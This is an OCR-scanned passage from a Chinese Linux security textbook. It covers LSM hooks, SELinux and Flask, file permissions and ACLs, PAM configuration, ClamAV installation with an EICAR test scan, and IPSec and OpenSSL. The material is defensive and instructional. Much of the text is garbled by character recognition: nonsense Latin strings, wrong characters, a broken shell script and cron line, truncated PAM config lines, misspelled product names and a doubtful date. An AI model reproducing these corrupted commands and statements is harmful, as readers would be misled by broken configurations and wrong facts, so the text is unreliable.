内 核 模块 的 形式 提供 给 用 户 使 用 。LSM 提供 的 结构 是 钧 子 , 在 初始 化 时 指 癌 虚拟 困 数 , 纺 
与 者 可 以 通过 重新 实现 这 些 钧 子 图 数 满足 目 己 的 安全 策略 。LSM fe fey Few Be] Be 
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include/linux/security. h 头 文件 中 security. operations 结构 的 定义 。 

LSM 提供 的 钧 子 包 括 程 序 沪 载 钧 于 、 任 务 钧 子 、 进 程 间 通信 和 钧 于 、 文 件 系 统 钧 子 、 网 络 
钓 子 等 。 程 序 装 载 钩子 主要 用 来 实现 当 安 全 模块 在 一 个 新 程序 执行 时 改变 特权 的 功能 。 
LSM 提供 的 程序 痛 载 钧 子 , 用 在 execve() 图 数 操作 执行 的 关键 点 上 ,用 于 允许 安全 模块 在 
初始 化 程序 过 程 中 访问 安全 信息 和 执行 访问 控制 ,以 及 模块 在 新 程序 成 功 闻 载 后 更 新 任务 
及 安全 信息 ; 除 此 之 外 ,还 提供 用 来 控制 程序 执行 过 程 中 状态 继承 的 钧 子 。 任 务 钧 子 用 来 
实现 安全 模块 常理 进 程 安 全 信息 .控制 进程 操作 。 进 程 间 通信 和 钧 子 可 执行 访问 控制 操作 。 
IPC Xt Ra Be 2 14 FEE kern_ipc_perm 于 结构 ,这 个 于 结构 中 有 一 个 指针 传 给 ipcperms() 
遇 数 进行 权限 检查 ,LSM 在 这 个 共 圣 于 结构 中 增加 一 个 安全 域 。LSM 在 现存 的 ipcperms() 
子 数 中 插入 一 个 钧 子 , 这 样 安 全 模块 就 可 以 对 Linux IPC 权限 进行 检查 。LSM 定义 了 三 类 
文件 钩子 ,分 别 是 文件 系统 钧 子 SEAN TF inode FAW. LSM 在 对 应 的 3 个 内 核 数据 
结构 (super_block 24474 inode 结构 , file 结构 ) 中 加 入 安全 域 。 LSM 对 网 络 应 用 层 访 问 的 
socket Ek FIHI SAF PR C. jx HE P4] T- 78 us PT SE socket 套 接 字 的 协议 。 除 此 之 外 ， 
LSM iffi tB BUE FATE ZR SET T^. BREUI THRHR, 81 £8 18 ER VJ EXTR ELS A 
核 操 作 ; RSC FAT dd a 3 9LA LUI] L/O 端口 .配置 进程 记 账 等 系统 操作 。 


12.3 SELinux KA 


12.3.1 Linux 5 SELinux 的 区 别 


传统 的 Linux 在 安全 管理 上 仅 采 用 上 月 主 访 问 控 制 机 制 (Discretionary Access Controls. 
DAC) ,而 SELinux 在 此 基础 上 增加 了 强制 访问 机 制 (MAC)。 

DAC 将 文件 系统 权限 控制 分 为 两 类 。 一 类 用 户 是 对 文件 系统 有 完全 控制 权 的 root 用 
P , 称 为 管理 者 用 户 ; 另 一 类 是 非 管理 者 用 户 ,主要 通过 访问 控制 列表 给 用 户 提 供 不 同 的 权 
IR. BEDAC 下 ,也 给 文件 客体 所 有 者 导致 文件 客体 潜在 风险 的 机 会 。 例 如 ,用 户 错 误 地 
使 用 chmod 命令 将 一 个 文件 或 目录 骏 壤 给 一 个 恶意 信任 者 ,这 个 恶意 信任 者 便 可 以 在 这 个 
文件 或 目录 下 做 任何 操作 ,如 执行 恶意 脚本 。 

MAC 可 以 定义 系统 中 的 所 有 进程 (主体 ) 对 系统 的 其 他 部 分 (文件 .设备 .其 他 进 
程 …… 客体 ) 的 操作 权限 或 许可 。 这 种 权限 或 许可 用 操作 系统 内 核 的 安全 策略 来 定义 。 因 
此 在 拥有 MAC 的 情况 下 即使 DAC 下 用 户 不 小 心 骏 露 了 他 的 数据 ,恶意 用 户 也 不 能 利用 该 

DAC 和 MAC 两 者 独立 ,都 拥有 自己 的 访问 控制 属性 。 其 访问 控制 属性 主要 区 别 
如 下 。 

(1) 在 主体 访问 控制 方面 。 

(D DAC: 有 效 的 用 户 与 用 户 组 ID. 

Q MAC: 安全 上 下 文 。 

(2) 在 客体 访问 控制 方面 。 

D DAC; 文件 访问 模式 (权限 归属 rwx r-- ---) 和 用 户 及 组 ID, 

2 MAC; 安全 上 上 下文 (user:role:type)。 
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济 络 攻防 原理 及 应 用 


12.3.2 Flask 安全 框架 


Flask 框 染 对 操作 许可 的 判定 过 程 ,站 先 通 过 DAC 权限 检查 后 再 经 过 MAC 权限 检查 。 
DAC 权限 检查 主要 是 通过 匹配 ACL 来 分 配 用 户 对 客体 的 权限 ,而 SELinux 权限 检查 过 程 
为 : 策略 强制 服务 器 首先 检查 AVC, 如 果 AVC 中 有 高 速 缓存 的 策略 决策 , 则 从 中 取出 该 策 
略 作为 策略 结果 。 否 则 策略 强制 服务 篆 从 主客 体 收 集 安 全 上 下 文 并 发 送 到 安全 服务 珍 , 安 
全 服务 需 使 用 系统 初始 化 期 间 闻 载 的 二 进 制 策略 与 收 到 的 主客 体 上 下 文 作出 决策 , 接 春 将 
"RESI AVC 的 cache 中 并 将 决策 返回 给 宁 略 强制 服务 夷 。 

图 12-2 所 示 为 Flask X 4t HEAR . Flask 安全 体系 结构 是 由 客体 管理 天 (主要 包含 策略 强 
制服 务 逢 ) 和 安全 服务 天 构 成 。 安 全 服务 太 用 于 作出 安全 策略 判定 ,客体 管理 天 用 于 判定 


结果 o 





客体 管理 器 安全 服务 器 


图 12-2 Flask 安全 框架 


安全 服务 如 的 安全 寅 略 由 4 个 于 案 略 组 成 : 类 型 加 踢 策 略 (TE)、 多 级 安全 策略 
(MLS) .基于 标识 的 访问 控制 策略 (IBAC) .基于 角色 的 访问 控制 (RBAC) 宁 略 。 安 全 服务 
合作 出 的 判定 必须 满足 每 一 个 子 柴 略 , 其 中 TE RBAC 是 案 略 配置 文件 必须 配置 的 。 


12.3.3 SELinux 安全 功能 


SELinux 模块 由 安全 服务 硕 、AVCCAccess Control Vector)、 网 络 接口 表 、netlink 时 间 
通知 代码 、SELinuxfs 伪 文 件 系统 及 hook PR Z& 6 个 部 分 构成 。 

安全 服务 器 的 应 用 有 RAVC,IAVC,MLS,IE; AVC 用 于 安全 服务 器 存储 访问 控制 策 
略 的 缓存 区 ,提高 了 安全 机 制 的 运行 性 能 。 同 时 它 也 提供 了 hook 函数 高 效 检查 授权 的 接 
口 ,以 及 安全 服务 天 管理 cache 的 接口 ; 网 络 接口 表 将 网 络 设备 映射 到 安全 上 和 下文, 通过 
hook 因数 得 找到 该 设备 并 上 映射; netlink 事件 通知 让 SELinux PR HTE SE MS E 2/0 e nho DA AS 
改变 时 通知 进程 。SELinux 伪 文 件 系 统 给 进程 提供 安全 服务 右 的 开 略 API; hook ph ZX n] 
通过 安全 域 应 用 管理 与 内 核对 象 相 关联 的 安全 信息 ,以 及 对 内 核 操 作 执 行 的 访问 控制 ,还 可 
以 通过 安全 服务 冀 及 AVC 得 到 系统 安全 宁 略 达到 标识 和 控制 内 核对 象 的 效果 ,也 可 以 通 
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过 调用 文件 系统 文件 属性 代码 得 到 和 设备 文件 上 的 安全 上 下 文 。 

Linux 内 核对 于 程序 的 运行 .文件 系统 的 超级 块 和 节点 ,以 及 文件 操作 ,任务 操 作 、 网 络 
连接 、socket、System V 进程 间 通信 等 提供 了 对 应 安全 操作 函数 ,这 些 函 数 指针 都 放 在 安全 
操作 函数 结构 中 ,由 于 结构 很 大 ,这 里 只 列 出 了 程序 运行 的 操作 函数 指针 ,这 些 操作 函数 指 
针 的 前 级 bprm 是 bin program 的 缩写 ,其 他 的 操作 函数 具有 类 似 结构 。 


12.4 文件 权限 管理 


1. UNIX 文件 权限 管理 

ACL( Access Control List) A UGO(User Group Other) 权 限 管 理 方式 是 由 型 的 目 主 访 
问 控制 机 制 ,ACL 将 文件 的 权限 信息 存储 在 节点 的 权限 中 ,而 UGO 将 文件 的 权限 信息 存 
储 在 市 点 的 属性 中 ，。 

传统 的 UNIX 文件 系统 采用 的 是 UGO 文件 权限 管理 方式 , 故 本 节 主 要 介绍 UGOR 
限 管 理 方式 。 

首先 介绍 文件 权限 位 的 分 配 ,UGO 文件 权限 管理 将 文件 的 操作 者 分 为 三 类 : User, 
Group,Other, User 指 的 是 文件 的 创建 者 ,同时 也 是 文件 的 拥有 者 ; Group 指 的 是 与 User 
同 组 的 用 户 ; Other 指 的 是 与 User 不 同 组 的 用 户 。UGO 文件 权限 管理 将 权限 位 设置 为 3 
位 ,分 别 代 表 读 (r) V Cw) AG GO, 

其 次 介绍 一 些 权 限 操 作 的 命令 : 常用 的 改变 权限 的 命令 为 chmod, 如 chmod 666 rw- 
rw- rw-, suid/guid 命令 可 以 使 文件 传递 属 主 用 户 的 权限 。 如 果 A 用 户 拥 有 文件 b, 那 么 B 
用 户 在 shell 下 执行 文件 b 时 也 拥有 与 A 用 户 一 样 的 权限 。Umask 可 以 为 新 建 的 文件 设置 
默认 权限 。 

2. ACL 权限 管理 

基本 权限 是 指 用 户 对 文件 拥有 所 有 者 所 属 组 和 其 他 人 每 个 身份 都 有 3 个 权限 分 别 是 
读 、 写 、 执 行 ,本 下 将 介绍 特殊 权限 一 一 ACL 权限 。 

ACL 权限 是 指针 对 一 个 目录 或 文件 指定 一 个 用 户 ,为 这 个 用 户 分 配 指 定 的 权限 。 

ACL 权限 一 般 用 在 需要 指定 的 用 户 拥 有 一 定 的 权限 时 才 会 使 用 ,了 驶 相当 于 Windows 
的 文件 夹 或 文件 的 权限 是 一 样 的 ,需要 哪个 用 户 有 哪些 权限 就 对 应 分 配 。 

Linux 系统 下 的 访问 控制 列表 (ACL) 主要 用 来 控制 用 户 的 权限 ,可 以 做 到 不 同 用 户 对 
同一 文件 有 不 同 的 权限 。 默 认 情 次 下 需要 确认 3 个 权限 组 : owner, group 和 other, ifi] f$ 
用 ACL, 可 以 增加 权限 给 其 他 用 户 或 组 别 , 而 不 单 只 是 简单 的 other 或 是 拥有 者 不 存在 的 组 
别 。 可 以 允许 指定 的 用 户 A、B 或 C 拥 有 写 权 限 而 不 再 是 让 他 们 整个 组 拥有 写 权 限 。 

下 面 是 一 些 与 ACL 权限 相关 的 命令 。 

(1) 为 用 户 test 设置 ACL: sudo setfacl -m u:test:rwx /shared, 

setfacl -m 表示 修改 ACL 内 容 。 用 户 可 通过 此 命令 为 新 的 用 户 增 加 权限 或 修改 用 户 已 
有 权限 。u 后 和 面 表示 需要 被 修改 权限 的 用 户 名 称 。 可 使 用 g 来 设置 组 的 权限 。user2 是 用 
户 名 称 , 使 用 g 设置 组 的 权限 时 ,在 此 处 填写 组 名 称 。rwx 表示 需要 设置 的 权限 。 

(2) 现在 增加 只 旋 权 限 给 用 户 test2: $ sudo setfacl -m u:test2:rx /shared, 
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(3) 读 取 ACL: $ Is -lh /shared. 

(4) 移 除 ACL: $ sudo setfacl -x u:test /shared, 

最 后 ,在 设置 了 ACL 文件 或 目录 工作 时 ,cp 和 mv 命令 会 改变 这 些 设置 。 在 cp 的 情况 
下 ,需要 添加 p 参数 来 复制 ACL 设置 。 如 果 不 可 行 , 它 将 会 展示 一 个 警告 。myv 默认 移动 
ACL 设置 ,如 果 也 不 可 行 , 它 也 会 展示 一 个 警告 。 


12.5 PAM 用 户 认 证 机 制 


Linux-PAM(Linux 可 插 人 认证 模块 ) 是 一 和 套 共 字库 ,使 本 地 系统 管理 员 可 以 随意 选择 
程序 的 认证 方式 , 即 不 用 重新 编写 和 重新 编译 一 个 包含 PAM 功能 的 应 用 程序 ,就 可 以 改变 
它 使 用 的 认证 机 制 。 在 这 种 方式 下 ,就 算 升 级 本 地 认证 机 制 ,也 不 用 修改 程序 。PAM 使 用 
配置 文件 /etc/pam. conf( 或 /etc/pam. dy/ 下 的 文件 ) 来 管理 对 程序 的 认证 方式 。 应 用 程序 调 
用 相应 的 配置 文件 ,从 而 调用 本 地 的 认证 模块 。 模 块 放置 在 /lib/security 下 ,以 加 载 动 态 库 
的 形式 进行 调用 (dlopen(3))。 与 使 用 su 命令 时 类 似 , 系 统 会 提示 输入 root HP Ay m ix 
就 是 su 命令 通过 调用 PAM 模块 实现 的 。 

1. PAM 框架 

PAM 为 了 实现 其 插件 功能 和 易 用 性 ,采取 了 分 层 设计 思想 。 就 是 让 各 鉴别 模块 从 应 
用 程序 中 独立 出 来 ,然后 通过 PAM API 作为 两 者 联系 的 纽 市 ,这 样 应 用 程序 承 可 以 根据 再 
要 灵活 地 在 其 中 ”搬入 ”所 需要 的 鉴别 功能 模块 ,从 而 真正 实现 了 在 认证 和 鉴别 基础 上 的 随 
需 应 变 。 实 际 上 ,这 一 思路 也 非 背 符合 软件 设计 中 的 “高 内 聚 , 低 砖 合 " 这 一 重要 思想 。 
PAM 框架 如 图 12-3 所 示 。 
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图 12-3 PAM 框架 


从 图 12-3 中 可 以 看 出 ,PAM 的 API 起 着 承 上 尼 下 的 作用 , 它 是 应 用 程序 和 认证 鉴别 
模块 之 间 联 系 的 纽带 和 桥梁 : 当 应 用 程序 调用 PAM API 时 ,应 用 接口 层 按照 PAM 配置 文 
件 的 定义 来 加 载 相应 的 认证 鉴别 模块 。 然 后 把 请 求 ( 即 从 应 用 程序 那里 得 到 的 参数 ) 传 递 给 
底层 的 认证 鉴别 模块 ,这 时 认证 鉴别 模块 就 可 以 根据 要 求 执行 具体 的 认证 鉴别 操作 了 。 当 
认证 鉴别 模块 执行 完 相 应 的 操作 后 ,再 将 结果 返回 给 应 用 接口 层 ,然后 由 接口 层 根据 配置 的 
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具体 情况 将 来 日 认证 鉴别 模块 的 应 答 返 回 给 应 用 程序 。 

2. PAM 配置 文件 

PAM 的 配置 有 两 种 方式 。 一 种 是 通过 修改 单个 配置 文件 /etc/pam. conf 进行 配置 。 
万 外 一 种 配置 方式 是 通过 配置 目录 /etc/pam. d/ ,其 优先 级 蜗 于 前 者 (限于 redhat), 

1) 使 用 配置 文件 /etc/pam. conf 

该 文件 是 由 以 下 的 行 所 组 成 的 。 


arguments module — type service — name module — path control ~ flag 


service-name 表示 服务 名 ,如 http, ftp, login 等 ,其 中 有 一 个 比较 特殊 的 服务 名 
“OTHER 其 代表 配置 文件 中 没有 明确 配置 的 其 他 所 有 服务 。 

module-type 是 指 模块 类 型 , 即 对 应 PAM 文 持 的 4 种 模块 管理 方式 ,每 种 模块 管理 方 
式 都 有 其 特有 的 模块 类 型 , 任 一 服务 都 可 调用 多 个 以 stack 方式 存在 的 PAM 模块 ,以 达到 
安全 认证 的 目的 。 

control-flag 用 以 标志 PAM 模块 成 功 与 否 对 应 的 PAM 操作 和 策略。 其 全 有 4 种 : 
required,requisite,sufficient,optional, required 表明 本 模块 必须 成 功 执 行 方 可 通过 认证 ， 
但 是 在 认证 过 程 中 不 会 立即 返回 认证 结果 而 是 必须 将 stack 中 所 有 的 其 他 PAM 模块 执行 
完 后 才能 返回 。 与 required EW. requisite 也 必须 待 该 模块 返回 成 功 时 才 可 通过 认证 ,一 旦 
模块 返回 不 成 功 , 则 不 在 执行 stack 中 的 其 他 模块 而 是 和 耳 接 返 回 认 证 结果 (此 方式 只 有 
RedHat 支持 ) sufficient 表明 本 模块 返回 成 功 已 经 足以 通过 身份 认证 的 要 求 , 不 必 再 执行 
同一 stack 内 的 其 他 模块 。optional 表明 本 模块 是 可 选 的 ,其 执行 成 功 与 否 对 认证 结果 毫 无 
影响 。 

对 于 control-flag. 从 Linux-PAM-0. 63 版 本 起 , 文 持 一 种 新 的 语法 ,具体 可 参看 
LinuxPAM 文档 。 

module-path 用 来 指明 本 模块 对 应 可 执行 文件 的 文件 路 径 ,一 般 应 为 绝对 路 径 ,如 果 设 
有 给 出 绝对 路 径 ,那么 默认 为 该 文件 在 /usry/libysecurity HR F. 

arguments 用 来 传递 模块 需要 的 参数 。 模 块 的 参数 no warn.debug,.user first pass, 
try first pass,use mapped pass,expose account, ] - JAx HE à 15] iH 开发 者 定义 . 因此 基本 各 
不 相同 ,但 也 有 一 些 相 同 的 地 方 。debug 表示 该 模块 用 syslog() 写 出 调试 信息 至 系统 日 志 
文件 。no_warn 表明 该 模块 禁止 发 送 警 告 信息 给 应 用 程序 。use_first_pass 表示 该 模块 只 
能 从 上 - .个 模块 处 得 到 用 户 密码 而 不 是 要 求 用 户 输入 密 位 try first pass 表示 该 模块 首 
和 完 从 上 一 块 模块 处 获得 用 户 密 人 码 , 如 果 不 成 功 ,再 要 求 用 户 输 入 密码 。use_mapped_pass X 
示 该 模块 使 用 映射 过 的 密码 而 非 用 户 输 入 密码 。expose_account 允许 该 模块 显示 账户 名 信 
旦 但 一 般 只 能 在 确保 当前 环境 安全 的 情况 下 使 用 ,以 防 泄露 用 户 名 造成 安全 隐患 。 

2) 使 用 配置 日 录 /etc/pam. d/ (只 适用 于 RedHat Linux) 

配置 目录 下 的 每 个 文件 部 对 应 看 相应 的 服务 名 ,如 login 服务 对 应 文件 /etc/pam. d/ 
login。 但 如 果 名 为 xxxx 的 服务 对 应 的 配置 文件 /etc/pam. d/xxxx 在 该 目录 下 不 存在 , 那 
么 该 服务 对 应 的 配置 文件 为 /etc/pam. d/other。 该 目录 下 每 个 配置 文件 的 格式 为 module- 
type control-flag module-path arguments。 其 每 个 字段 的 含义 和 /etc/pam. conf 中 的 相同 。 
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3) 配置 的 例子 

下 面 是 一 个 用 /etc/pam. conf 配置 默认 的 认证 方式 ,将 拒绝 所 有 没有 在 /etc/pam. conf 
中 明确 配置 的 服务 。OTHER 代表 没有 明确 配置 的 其 他 所 有 服务 ,pam_deny 模块 的 作用 只 

OTHER auth required /usr/lib/security/pam 

OTHER account required /usr/lib/security/pam deny 


OTHER password required /usr/lib/security/pam 
OTHER session required /usr/lib/security/pam deny 


12.6 杀毒 应 用 程序 


1. 几 种 常用 杀毒 程序 

Linux 平台 下 的 杀毒 应 用 程序 比较 多 ,本 市 简单 的 列举 5 个 杀毒 应 用 程序 。 

(1) ClamAV 杀毒 是 Linux 平台 最 受 欢 迎 的 杀毒 软件 ,ClamAV 属于 免费 开源 产品 , 文 
持 多 种 平台 ,如 Linux/UNIX,MAC OS X, Windows, OpenVMS, ClamAV 是 基于 病毒 扫 
描 的 命令 行 工具 ,但 同时 也 有 支持 图 形 界 面 的 ClamTK TH., ClamAV 主要 用 于 邮件 服务 
融 扫 摘 邮 件 , 它 有 多 种 接口 从 邮件 服务 硕 扫 摘 邮 件 , 文 持 文 件 格式 有 ZIP, RAR. TAR, 
GZIP,BZIP2, HTML,DOC,PDF,SIS CHM,RTF 5$, ClamAV 有 月 动 的 数据 库 更 新 天， 
还 可 以 从 共享 库 中 运行 。 命 令 行 的 界面 让 ClamAV 运行 流畅 ,不 必 以 后 台 进 程 的 方式 运 
行 , 当 需要 扫 摘 时 只 需 输 入 扫描 命令 指定 文件 或 目录 即 可 。 

(2) 对 于 个 人 计算 机 来 说 ,Avast 是 最 好 的 防 病毒 解决 方案 之 一 。Avast Linux KKE i 
是 免费 的 ,只 能 用 于 家 庭 或 非 商业 用 途 。 侧 单 易 用 的 用 户 界 面 和 其 他 特性 使 得 Avast 变 得 
逐渐 流行 起 来 ,同样 支持 GUI 和 命令 行 两 种 工具 。 所 有 用 户 都 能 轻松 地 操作 ,因为 它 有 简 
单 界 面 (初级 用 户 ) 和 高 级 界面 (高 级 用 户 ),Avast 还 有 一 些 特性 ,如 自动 更 新 .内 置 邮 件 扫 

(3) 53 —"T Linux 下 比较 好 用 的 杀毒 软件 是 Avria 免费 杀毒 版 ,Avria 提供 可 扩展 配 
置 ,控制 用 户 的 计算 机 成 为 可 能 。 它 有 一 些 很 强大 的 特性 ,如 简单 的 脚本 安装 方式 、 命 令 行 
扫描 器 .自动 更 新 (产品 .引擎 .VDF) .自我 完整 性 程序 检查 等 。 

(4) 现在 有 超过 10 亿 用 户 使 用 的 AVG 杀毒 软件 同样 是 Linux FAP ARERR, fa 
费 版 提供 的 特性 比 高 级 版 要 少 。AVG 目前 还 不 支持 图 形 界面 ,但 提供 防 病毒 和 防 间 谍 工 
具 ,AVG 运行 速度 很 快 , 占 用 系统 资源 很 少 , 文 持 主 流 Linux 版 本 ,如 Debian, Ubuntu, Red 
hat, Cent OS, FreeBSD 等 。 

(5) F-PORT 属于 Linux 用 户 中 的 一 种 新 的 杀毒 解决 方案 ,对 家 庭 用 户 免 费 。 它 有 使 
用 元 龙 (cron) 工 具 的 任务 调度 的 特性 ,能 在 指定 时 间 执 行 扫 摘 任务 。 同 时 它 还 可 以 扫 摘 
USB HDD, Pendrive, CD-ROM, ,网络 驱动 .指定 文件 或 目录 、 引 守 区 病毒 扫描 、 镜 像 。 

2. Clam 杀毒 程序 的 安装 

本 小 节 利 用 Clam AntiVirus 来 建立 Linux 下 的 病毒 查 杀 系统 。 为 了 消除 后 来 的 隐患 ， 
建议 务必 在 服务 需 公 开 以 前 构建 病毒 查 杀 系统 (注意 : 系统 必须 安装 NTP 服务 ,而 且 时 间 
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必须 要 与 北京 时 间 一 致 ,否则 会 导致 Clam AAT HO, XE" yum -y install ntp/usr/sbin/ 
ntpdate pool. ntp. org”, 由 于 Clam Antivirus 不 存在 于 CentOS 中 yum 的 官方 库 中 ,因此 用 
yum XX ClamAntivirus 需要 定义 非 官 方 的 库 。vim /etc/yum. repos. d/dag. repo 添加 
如 下 : 


(1)name = Dag RPM Repository for Red Hat Enterprise Linux 
baseurl = http: //apt. sw. be/RedHat/el $ releasever/en/ $ basearch/dag 


gpgcheck - 1 
enabled = 1 

(2)rpm - Uvh http: //apt. sw. be/redhat/el5/en/i386/rpmforge/RPMS/rpmforge — release 一 
0. 5.2 — 2. el5. rf. 1396. rpm # Jj dag FJ E% HIA HE 

(3)yum - y install clamd B 在线 安装 ClamAntiVirus 

(4) freshclam HH clam 的 病毒 库 

(5)chkconfig clamd on # 将 其 设置 为 目 系 统 局 动 后 局 动 

(6)service clamd start 站 启动 Cland 杀毒 软件 

(7)clamdscan # 扫 摘 杀毒 


测试 、 下 载 市 病毒 软件 ,如 下 : 


http://www. eicar. org/download/eicar.com wget 
http://www. eicar. org/download/eicar com. zip 
[root(àMYSQL- 01 opt]& 11 


total 24 

—rw-r--r-- 1 root root 68 Jul 19 11:20 eicar. com 
—rw-r--r-- 1 root root 184 Jul 19 11:19 eicar com. zip 
—IW—r--r-- 1 root root 3676 Jul 13 03:39 linux. sh 





[root(àQMYSQL- 01 opt] # clamdscan * 

/opt/eicar_com. zip: Eicar — Test - Signature FOUND 井 < 发 现 被 病毒 感染 的 文件 
/opt/eicar. com: Eicar - Test — Signature FOUND #- 发 现 被 病毒 感染 的 文件 
/opt/linux.sh: OK 


Infected files: 2 
Time: 0.005 sec (0 m O s) 





[ root @MYSQL — 01 opt] # clamdscan -- remove # 一 再 次 进行 病毒 扫描 ,并 附加 删除 选项 
/opt/eicar com.zip: Eicar — Test— Signature FOUND 

/opt/eicar com.zip: Removed. + <— 删除 被 病毒 感染 的 文件 
/opt/eicar.com: Eicar - Test - Signature FOUND 

/opt/eicar.com: Removed. H 删除 被 病毒 感染 的 文件 

lx M c E D SCAN SUMMARY 一 一 一 一 一 一 一 一 一 一 一 


Infected files: 2 

Time: 0.007 sec (0m O s) 

[ root @MYSOL— 01 opt]it clamdscan * 井 现 在 已 经 设 有 病毒 文件 了 
/opt/linux.sh: OK 


Linux 平台 下 软件 的 安装 方法 大 致 有 两 种 ,一 种 是 采用 apt-get 安装 ,用 命令 形式 sudo 
apt-get install XXX ,来 安装 xxx 软件 , 男 一 种 是 从 互联 网 上 下 载 安 装 包 ,不 同 的 Linux 系统 
及 用 不 同 的 命令 安装 (如 Unbuntu, centos), 
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3. 常用 charmAV 命令 


THE. 
Freshclam 由 超级 用 户 启 动 并 下 降 权 限 切换 到 charmAV FBP. clarmAV 使 用 
Freshclam 工具 定期 检查 数据 库 并 更 新 。 

(1) 配置 Clam。 


vi /etc/clamd. conf 


找到 ArchiveBlockMax 将 前 面 加 上 ” 井 ”( 不 把 大 容量 的 压缩 文件 看 作 被 感染 病毒 的 
文件 ) 

找到 User clamav 将 前 面 加 上 ” 井 ”( 不 允许 一 般 用 户 探 制 ) 

(2) 更 新 病毒 库 。 


freshclam 


(3) 扫 摘 病毒 clamdscan 扫 摘 ,发现 病 毒 删 除 。 


clamdscn 一 remove 


(4) 建立 自动 运行 脚本 vi scan. sh (输入 如 下 ) 。 


#!/bin/bash 

PATH = /usr/bin: /binOCLAMSCANTMP = 'mktemp'clamdscan —-- recursive —— remove / > $ CLAMSCANTMP 
[! -z " $ (grep FOUNDS $ CLAMSCANTMP)" ] && /grep FOUND $ CLAMSCANTMP | mail - s "Virus Found 
in 'hostname'" root rm — f $ CLAMSCANTMP 


(5) 定期 更 新 。 


chmod 700 scan. sh 
crontab - e (编辑 计划 任务 ,添加 如 下 行 ) 
0003 x * * /root/scan.sh (每 天 3 点 扫描 ) 


12.7 Linux 网 络 传输 协议 安全 


伴随 技术 的 发 展 , 网 络 安全 的 原理 被 广汉 的 应 用 于 Internet H. H nij fE Pd 2&8 E ae 5 
LAUR BATA EI. Linux 作为 受 欢 迎 的 操作 系统 之 一 ,提供 了 文 持 上 述 网 络 
安全 协议 运行 的 功能 。 

1. Linux 中 IPSec 使 用 

在 1988 年 发 布 的 因特网 网 络 层 安全 系列 中 摘 述 了 IPSec, 即 IP 安全 协议 。IPSec 是 面 
向 网 络 层 中 IP 数据 报 内 容 加 密 的 协议 ,同时 对 传输 IP 数据 包 的 主机 进行 验证 。IPSec 协议 
依靠 鉴别 首部 AH 协议 和 封装 安全 有 效 载 集 ESP 协议 。ESP 协议 的 功能 包含 AH 协议 的 
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功能 ,但 由 于 AH 协议 应 用 较 早 ,因此 无 法 废 痉 AH 协议 。AH 协议 和 ESP 的 协议 格式 如 

图 12-4 所 示 ,ESP 尾部 会 和 数据 报 的 数据 部 分 一 同 加 密 , 从 而 攻击 者 无 法 获得 传输 层 协 议 

类 型 。ESP 鉴别 用 于 存储 报 文摘 要 ,保障 数据 完整 性 。 
AH f X 

LIPS [Annas [ TCHUDPRUGH 


ESP 协 议 格 式 








IP 百 部 “| ESPE BB |TCP/UDP 报 文 段 | ESP 尾 部 | ESP 鉴 别 


图 12-4 AH 和 ESP Æ IP 数据 报 中 的 位 置 


为 了 建立 更 加 私密 的 网 络 通信 环境 ,多 数 公 司 使 用 虚拟 专用 网 (VPN ) 的 方式 。IPSec 
是 VPN 标准 的 一 种 实现 。 使 用 IPsec 协议 可 以 建立 足够 可靠、 私密 的 网 络 通信 环境 。 
IPSec 既 可 以 建立 点 到 点 的 连接 也 可 以 建立 网 络 到 网 络 的 连接 ,以 使 用 Linux 系统 建立 点 
到 点 连接 的 IPSec 协议 为 例 。 

建立 一 个 点 到 点 的 IPSec 连接 ,需要 以 下 信息 。 两 个 连接 节点 的 IP 地 址 ,每 个 IPSec 
的 连接 名 称 、 加 密 密 钥 、 预 共享 密 钥 。 加 密 密 钥 可 以 使 用 racoon A zi gl S£ . tE HH Bd sg: s H 
来 交换 预 共 至 密 钥 。 如 下 所 示 , 通 过 以 下 内 容 可 建立 与 男 一 个 工作 站 点 到 点 的 IPSec 连接 。 
X. X. X. X 表示 目的 计算 机 的 IP 地 址 。ONBOOT= yes 表示 连接 是 在 启动 期 间 建 立 的 ， 
IKE_METHOD= PSK 表示 使 用 预 共 享 密 钥 验 证 方法 。 


DST = 'X.X.X.X' 
TYPE = IPSEC 
ONBOOT = yes 

IKE METHOD = PSK 


为 保障 连接 能 正常 建立 , 须 在 两 台 建 立 IPSec 连接 的 计算 机 上 配置 相同 的 预 共享 密 钥 ， 
预 共 享 密 钥 的 内 容 如 下 。 


IKE PSK=my key 


在 IPSec 通道 激活 时 会 生成 X.X.X. X. conf 文件 ,在 IPSec 连接 建立 时 会 生成 racoon. 
conf M/F, HAGE. 


path include "/etc/racoon"; 

path pre shared key "/etc/racoon/psk. txt"; 

path certificate "/etc/racoon/certs"; 

sainfo anonymous 

{pfs group 2; 
lifetime time 1 hour ; 
encryption algorithm 3des, blowfish 448, rijndael ; 
authentication algorithm hmac shal, hmac md5 ; 
compression algorithm deflate ; 

} 

include "/etc/racoon/X. X. X. X. conf" 
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在 建立 IPSec 连接 后 可 以 使 用 tcpdump 工具 检查 IPSec 连接 。 
2. Linux 中 OpenSSL 使 用 
安全 套 接 字 层 协议 (SSL ) ,由 Netscape 公司 推出 。SSL 目标 在 于 保障 两 个 主体 间 通 信 
的 保密 性 与 可 靠 性 。SSL 依稀 建立 在 TCP 协议 之 上 ,SSL 协议 对 应 用 层 协议 透明 。 在 应 用 
层 协议 通信 前 完成 加 密 ,应 用 层 协议 传输 的 数据 都 会 被 加 密 。TLS 是 IETF 制定 的 一 种 新 
的 协议 ,建立 在 SSL 3. 0 协议 规范 之 上 ,是 SSL 3.0 的 后 续 版 本 。TLS 与 SSL3. 0 所 支持 的 
加 密 算 法 不 同 ,TLS 与 SSL3.0 之 则 不 能 进行 互 操作 。SSL/TLS 与 应 用 层 协 议 及 TCP Hh 
议 的 关系 如 图 12-5 所 示 。 
应 用 县 协 议 OpenSSL 是 一 个 开源 的 软件 库 包 , 主 要 使 用 C 请 
言 实现 ,完成 了 基本 的 加 密 功 能 、SLL 协议 和 TLS 协 
iX, OpenSSL 可 以 运行 在 大 多 数 UNIX 系统 ,包括 
Linux, Mac OS 等 。 在 Windows 系统 须 进 行 编译 安装 。 
OpenSSL 软件 包 主 要 实现 的 三 部 分 功能 ,包括 密码 算法 


HTTP FTP 


" PE SSL 协议 库 .应 用 程序 。 
iz VD OpenSSL 提供 了 对 证 书 . 公 私 钥 .证 书 请 求 等 数据 
图 12-5 SSL/TLS 与 应 用 层 协议 及 ”对象 DER.PEM,BASE^64 的 编 解码 功能 。OpenSSL 提 
TCP 协议 的 关系 供 产 生 公 开 密 钥 对 、 堆 成 秘 钥 的 方法 和 应 用 程序 。 


OpenSSL 在 标准 中 提供 了 对 私 钥 的 加 密 保 护 ,实现 了 密 
